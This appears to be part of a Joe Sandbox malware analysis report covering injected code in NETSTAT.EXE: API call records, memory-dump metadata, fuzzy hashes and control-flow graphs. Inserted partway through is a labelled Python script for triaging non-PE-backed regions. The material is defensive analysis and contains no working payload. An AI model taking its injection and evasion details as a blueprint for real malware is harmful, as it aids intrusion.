                                                                                                                                                                            • API String ID: 3535843008-1332303170
                                                                                                                                                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                            • Instruction ID: 88a36bd77c65c5801f1799ea5197e8e206c61bee7286eeb5f53044f0e542cd0a
                                                                                                                                                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                            • Instruction Fuzzy Hash: A6D01776200214ABD710EB98DC89EA77BACEF88760F154499BA189B282D530FA0086E0
                                                                                                                                                                            APIs
                                                                                                                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00512D11,00002000,00003000,00000004), ref: 0052A539
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2167126740-0
                                                                                                                                                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                            • Instruction ID: 293c0815de7640dfa394b58dff2a9261d4775abedd54b4260f55379a44884eae
                                                                                                                                                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                            • Instruction Fuzzy Hash: FEF015B6200218ABCB14DF89DC81EAB77ADAF88754F118148BE0897241C630F810CBA0
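The entries above are the per-function records Joe Sandbox emits from its IDA plugin: the native API the function calls (with the stack values seen at the call site and the call's address), the memory dump the function came from, whether that region is backed by a PE image on disk, and opcode/instruction hashes for similarity lookups. Across a report this long, what a triager actually wants is a per-region summary: which dumped regions are not PE-backed (here the 0x510000 region in NETSTAT.EXE, "based on PE: false", which is what injected or unpacked code looks like) and which ntdll Nt*/Zw* functions those regions call directly. The script below is an added example and not part of the Joe Sandbox report or its tooling; it parses a constructed sample cut down from the entries above (the bullet lines it uses are kept verbatim, the rest of each entry is dropped) and flags non-PE-backed regions that reach the native API directly. The FunctionEntry fields, the region keying by snapshot file and the flag text are my own choices.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: three entries cut down from the report above (lines the parser
# uses are kept verbatim; the remaining bullet lines of each entry are omitted).
SAMPLE_ENTRIES = """\
APIs
• NtCreateFile.NTDLL(00000060,00000000,.z`,00524BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00524BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0052A36D
Memory Dump Source
• Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
• Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
• API ID: CreateFile
• Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
• Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241D630E811CBA4
APIs
• NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00512D11,00002000,00003000,00000004), ref: 0052A539
Memory Dump Source
• Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
• Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
• API ID: AllocateMemoryVirtual
• Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
• Instruction Fuzzy Hash: FEF015B6200218ABCB14DF89DC81EAB77ADAF88754F118148BE0897241C630F810CBA0
APIs
Memory Dump Source
• Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
• Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
• API ID: InitializeThunk
• Opcode ID: 0bcfe5845ba2fd451f5654ec3534a6c9b82e755b080cd36c9c8a780b1fcccbd3
• Instruction Fuzzy Hash: 25900261602404035505B1584514616400A87E5201B55D022E1019590DC72589916129
"""

# One regex per field. "Instruction Fuzzy Hash" is the last line of every entry and closes it.
CALL_RE = re.compile(r"^•\s*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(r"Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")
SNAP_RE = re.compile(r"Snapshot File:\s*(\S+)")
APIID_RE = re.compile(r"API ID:\s*(.*)")
OPCODE_RE = re.compile(r"Opcode ID:\s*([0-9a-f]{64})")
FUZZY_RE = re.compile(r"Instruction Fuzzy Hash:\s*([0-9A-Fa-f]+)")


@dataclass
class FunctionEntry:
    calls: list[tuple[str, str, str]] = field(default_factory=list)  # (api, module, call-site address)
    source_file: str = ""
    offset: str = ""
    based_on_pe: bool | None = None
    snapshot: str = ""
    api_id: str = ""
    opcode_id: str = ""
    fuzzy_hash: str = ""


def parse_entries(text: str) -> list[FunctionEntry]:
    """Turn the per-function bullet blocks into FunctionEntry records."""
    entries: list[FunctionEntry] = []
    cur = FunctionEntry()
    for raw in text.splitlines():
        line = raw.strip()
        if m := CALL_RE.match(line):
            cur.calls.append((m["api"], m["mod"], m["ref"]))
        elif m := SOURCE_RE.search(line):
            cur.source_file, cur.offset = m["file"], m["off"]
            cur.based_on_pe = m["pe"] == "true"
        elif m := SNAP_RE.search(line):
            cur.snapshot = m.group(1)
        elif m := APIID_RE.search(line):
            cur.api_id = m.group(1).strip()
        elif m := OPCODE_RE.search(line):
            cur.opcode_id = m.group(1)
        elif m := FUZZY_RE.search(line):
            cur.fuzzy_hash = m.group(1)
            entries.append(cur)  # last field of an entry: close it and start the next
            cur = FunctionEntry()
    return entries


def native_calls(entry: FunctionEntry) -> list[str]:
    """Nt*/Zw* functions this function calls in ntdll, i.e. direct use of the native API."""
    return [api for api, mod, _ in entry.calls
            if mod.upper() == "NTDLL" and api.startswith(("Nt", "Zw"))]


def triage(entries: list[FunctionEntry]) -> dict[str, dict]:
    """Per memory region (keyed by snapshot file): PE-backed or not, function count,
    the native calls seen, and a flag when a non-PE-backed region reaches ntdll directly."""
    regions: dict[str, dict] = {}
    for e in entries:
        r = regions.setdefault(e.snapshot, {"offset": e.offset, "pe_backed": e.based_on_pe,
                                            "functions": 0, "native_calls": [], "flag": None})
        r["functions"] += 1
        r["native_calls"].extend(native_calls(e))
    for r in regions.values():
        if r["pe_backed"] is False and r["native_calls"]:
            # Code with no backing image that drives the native API itself is what
            # injected or unpacked payloads look like; it deserves a closer look.
            r["flag"] = "non-PE-backed region calls ntdll Nt* directly"
    return regions


if __name__ == "__main__":
    for name, r in triage(parse_entries(SAMPLE_ENTRIES)).items():
        print(f"{name}: offset={r['offset']} pe_backed={r['pe_backed']} "
              f"functions={r['functions']} native={r['native_calls']} flag={r['flag']}")
```

Feed it the text of the whole "Functions" section instead of the sample and the per-region view falls out directly; the opcode IDs kept on each entry let you deduplicate functions that the report lists more than once before counting.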
APIs
Memory Dump Source
• Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
• Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 0bcfe5845ba2fd451f5654ec3534a6c9b82e755b080cd36c9c8a780b1fcccbd3
• Instruction ID: d8bd4893e84391c255f6e314948f275716f435e68249f9bf4b6c23db9dc38ec9
• Opcode Fuzzy Hash: 0bcfe5845ba2fd451f5654ec3534a6c9b82e755b080cd36c9c8a780b1fcccbd3
• Instruction Fuzzy Hash: 25900261602404035505B1584514616400A87E5201B55D022E1019590DC72589916129
APIs
Memory Dump Source
• Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
• Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 60d7d41157a8883bd437426f217e81cbac8a24e28d0550188a2dde96d736681d
• Instruction ID: d39b753849ddb8b6fa88e95231e93b82fb5910af1068c53e9a05c636608a10b1
• Opcode Fuzzy Hash: 60d7d41157a8883bd437426f217e81cbac8a24e28d0550188a2dde96d736681d
• Instruction Fuzzy Hash: A390023160140C03E580B158450464A000587D6301F95D016A002A654DCB158B5977A5
APIs
Memory Dump Source
• Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
• Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: e26e3ba7ec0dfb12adcbfbb3dfcecfafebf3d339caf56b5eafd110511dc75d37
• Instruction ID: 6ea592d64b8e8dc17b71fb399decc6036a012a8002236dc48db86c6e6d8a71c0
• Opcode Fuzzy Hash: e26e3ba7ec0dfb12adcbfbb3dfcecfafebf3d339caf56b5eafd110511dc75d37
• Instruction Fuzzy Hash: 0290023160544C43E540B1584504A46001587D5305F55D012A0069694D97258E55B665
APIs
Memory Dump Source
• Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
• Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: f2ba58edbf92412b9fcaaa87d7dbb5351fb321180cc4885ff7a503f5cb71229b
• Instruction ID: 33702ac57124124d67afa84a66f4fefd5d5296c344f61e1f3f56cee062fe08bc
• Opcode Fuzzy Hash: f2ba58edbf92412b9fcaaa87d7dbb5351fb321180cc4885ff7a503f5cb71229b
• Instruction Fuzzy Hash: 44900435711404031505F55C07045070047C7DF351355D033F101F550CD731CD715135
APIs
Memory Dump Source
• Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
• Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: ed1ebe23f4cf7605ec45ee1e797d20ec4a89d64668b4741749b678ac5266903d
                                                                                                                                                                            • Instruction ID: 1c931d2e0609b89483c57d97f2bd290f4ce4456a76911064216e3ad26ed278ad
                                                                                                                                                                            • Opcode Fuzzy Hash: ed1ebe23f4cf7605ec45ee1e797d20ec4a89d64668b4741749b678ac5266903d
                                                                                                                                                                            • Instruction Fuzzy Hash: E890026174140843E500B1584514B060005C7E6301F55D016E1069554D8719CD52612A
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: e42cce0563d577a16d82d1659efa29bd4c7c86ed9322edbf49ca66d2fc04656a
                                                                                                                                                                            • Instruction ID: 62899d29cf26d88080e9eb023d5151fbb1500ff60277fd9050bf6e9f1b5a1123
                                                                                                                                                                            • Opcode Fuzzy Hash: e42cce0563d577a16d82d1659efa29bd4c7c86ed9322edbf49ca66d2fc04656a
                                                                                                                                                                            • Instruction Fuzzy Hash: 69900221611C0443E600B5684D14B07000587D5303F55D116A0159554CCB1589615525
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: bffa766f44f9f806248578854bd0e4ffd1a3de90747e9573a35cfd95357763f4
                                                                                                                                                                            • Instruction ID: f8db2ff6a7d9a2a070bdc00b675c1994c0338f8f032ee20f605ac8e60899c4d8
                                                                                                                                                                            • Opcode Fuzzy Hash: bffa766f44f9f806248578854bd0e4ffd1a3de90747e9573a35cfd95357763f4
                                                                                                                                                                            • Instruction Fuzzy Hash: 9290027160140803E540B1584504746000587D5301F55D012A5069554E87598ED56669
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 1889a85ca616d9c63695dd258030c4876a1e5ead28464905ef1e9e33a261c327
                                                                                                                                                                            • Instruction ID: 4c9688672ede83a670184d5c73eb94b38e31927a3e7ef667e2ce3826ea3bd7d6
                                                                                                                                                                            • Opcode Fuzzy Hash: 1889a85ca616d9c63695dd258030c4876a1e5ead28464905ef1e9e33a261c327
                                                                                                                                                                            • Instruction Fuzzy Hash: F190022961340403E580B158550860A000587D6202F95E416A001A558CCB1589695325
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 9fa915a8cd6930a1b26f244741f0fb8ffabc4af18817125f457a75488acebbd0
                                                                                                                                                                            • Instruction ID: 9c97b98a85ceb7c0c2334a833695da66ae778d31fa262f61758f88b2853de062
                                                                                                                                                                            • Opcode Fuzzy Hash: 9fa915a8cd6930a1b26f244741f0fb8ffabc4af18817125f457a75488acebbd0
                                                                                                                                                                            • Instruction Fuzzy Hash: 34900221642445536945F1584504507400697E5241795D013A1419950C87269956D625
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 29649ba5ba17f6736df832ba000a9ab4c2639660d5ea8c8c59dda7fdb93e03d0
                                                                                                                                                                            • Instruction ID: 26cbd7d12599a85cc825a28bbc3770e768ec8cbd69694b26b56b13ff2459342a
                                                                                                                                                                            • Opcode Fuzzy Hash: 29649ba5ba17f6736df832ba000a9ab4c2639660d5ea8c8c59dda7fdb93e03d0
                                                                                                                                                                            • Instruction Fuzzy Hash: 0290023160140813E511B1584604707000987D5241F95D413A0429558D97568A52A125
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 5bec8825cdd95e31826dddb833655979ddf89ddefaa3a9a31e8309e59402989c
                                                                                                                                                                            • Instruction ID: 33309a373755400ac682e1e90de5edf32e6b70f14864c4d80b42e601377c5f9e
                                                                                                                                                                            • Opcode Fuzzy Hash: 5bec8825cdd95e31826dddb833655979ddf89ddefaa3a9a31e8309e59402989c
                                                                                                                                                                            • Instruction Fuzzy Hash: 5D90023160148C03E510B158850474A000587D5301F59D412A4429658D879589917125
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
• API String ID: 2994545307-0
• Opcode ID: 866621d45d79d928765590aab8e0d51329798e827f1af4eb87e250a7d6455e48
• Instruction ID: e1b5add47eae364df2f1a4b6d667049b7fa5c264c3a63f08b5de6cb583788f6f
• Opcode Fuzzy Hash: 866621d45d79d928765590aab8e0d51329798e827f1af4eb87e250a7d6455e48
• Instruction Fuzzy Hash: 5290023160140C43E500B1584504B46000587E5301F55D017A0129654D8715C9517525

APIs
Memory Dump Source
• Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
• Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 69ed8a49f6acb71c6b20504c501b77d67739bd39a18ae633bcea740130143dea
• Instruction ID: edb590596365cb59d601ea48fef6d64a18d98d7536695e74d2656e8dc7b9bf32
• Opcode Fuzzy Hash: 69ed8a49f6acb71c6b20504c501b77d67739bd39a18ae633bcea740130143dea
• Instruction Fuzzy Hash: 8990023160140803E500B5985508646000587E5301F55E012A5029555EC76589916135

APIs
Memory Dump Source
• Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
• Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: a6d692e42eb6982e621a0a9b322a4dbb20ba2777cd6c47753a4dc5cea26021cd
• Instruction ID: 19e25916780332dae546bde39a5a95410ddbef9fe747774fc28f3353343033c8
• Opcode Fuzzy Hash: a6d692e42eb6982e621a0a9b322a4dbb20ba2777cd6c47753a4dc5cea26021cd
• Instruction Fuzzy Hash: F6900231A0550803E500B1584614706100587D5201F65D412A0429568D87958A5165A6

Control-flow Graph

Basic blocks (id: address range, calls -> successor blocks):
• 401: 529040-529082, call 52bd00 -> 404, 405
• 404: 529088-5290d8, call 52bdd0, call 51ace0, call 524e40 -> 412
• 405: 52915c-529162 (no successors)
• 412: 5290e0-5290f1, Sleep (000007D0 = 2000 ms) -> 413, 414
• 413: 5290f3-5290f9 -> 415, 416
• 414: 529156-52915a -> 405, 412 (back edge to the Sleep block)
• 415: 529123-529144, call 528e70 -> 420
• 416: 5290fb-529121, call 528c60 -> 420
• 420: 529149-52914c -> 414
APIs
• Sleep.KERNELBASE(000007D0), ref: 005290E8
Strings
Memory Dump Source
• Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
• Opcode ID: 67dfdab9b289bf323b02092197777028d9790be4d6a7d0ccd77969d3ff99cbb0
• Instruction ID: 34ff11cd1b5a4d5347a1f5a2682e745c4cb45ee62ca55c2ef3770000e5129791
• Opcode Fuzzy Hash: 67dfdab9b289bf323b02092197777028d9790be4d6a7d0ccd77969d3ff99cbb0
• Instruction Fuzzy Hash: A331C4B2500755BBC724DF65D889FA7BBB8BF88B00F00841DF62A6B285D730B550CBA4

Control-flow Graph

Basic blocks (id: address range, calls -> successor blocks):
• 421: 529036-529082, call 52bd00 -> 425, 426
• 425: 529088-5290d8, call 52bdd0, call 51ace0, call 524e40 -> 433
• 426: 52915c-529162 (no successors)
• 433: 5290e0-5290f1, Sleep (000007D0 = 2000 ms) -> 434, 435
• 434: 5290f3-5290f9 -> 436, 437
• 435: 529156-52915a -> 426, 433 (back edge to the Sleep block)
• 436: 529123-529144, call 528e70 -> 441
• 437: 5290fb-529121, call 528c60 -> 441
• 441: 529149-52914c -> 435
APIs
• Sleep.KERNELBASE(000007D0), ref: 005290E8
Strings
Memory Dump Source
• Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
• Opcode ID: 8ce54d0030ea9711474f0c820136d5c0a83954125378267c1b79227ddecc5476
• Instruction ID: 4ea46d64507772fd2157c86b3641745285588ac30e7a26fa114ee8fea90340bb
• Opcode Fuzzy Hash: 8ce54d0030ea9711474f0c820136d5c0a83954125378267c1b79227ddecc5476
• Instruction Fuzzy Hash: B231F2B2500356ABD714DF64D889FA7BBB8BF88700F00802DF6296B385D770A560CBA4

Control-flow Graph

Basic blocks (id: address range, calls -> successor blocks):
• 553: 52a662-52a663 -> 554, 555
• 554: 52a665-52a689 -> 558, 559
• 555: 52a5fb-52a604 -> 556, 557
• 556: 52a60c-52a621, RtlAllocateHeap (no successors)
• 557: 52a607, call 52af20 -> 556
• 558: 52a68f-52a69c (no successors)
• 559: 52a68a, call 52af20 -> 558
APIs
• RtlAllocateHeap.NTDLL(&ER,?,00524C9F,00524C9F,?,00524526,?,?,?,?,?,00000000,00000000,?), ref: 0052A61D
Strings
Memory Dump Source
• Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID: &ER
• API String ID: 1279760036-3421137112
• Opcode ID: 6dd01e8ceb169f57b029818a04b1aa70bf83ddd9ecb4785666047b33479d99ef
• Instruction ID: 75e58806bbe906d6a8c0b7373359945271256770306a2243d8ab9d461a8575c2
• Opcode Fuzzy Hash: 6dd01e8ceb169f57b029818a04b1aa70bf83ddd9ecb4785666047b33479d99ef
• Instruction Fuzzy Hash: 0FF0F4BA204210BFDB20DFA8EC84ED73B94EF85354F058159F9485B782D231DD1586A1

Control-flow Graph

Basic blocks (id: address range, calls -> successor blocks):
• 567: 52a5f0-52a621, call 52af20, RtlAllocateHeap (single block)
APIs
• RtlAllocateHeap.NTDLL(&ER,?,00524C9F,00524C9F,?,00524526,?,?,?,?,?,00000000,00000000,?), ref: 0052A61D
Strings
Memory Dump Source
• Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID: &ER
• API String ID: 1279760036-3421137112
• Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
• Instruction ID: a241158879c9b0e357d2e150b56aad4ebcef9ec9a517e4484c5395e2fa766a35
• Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
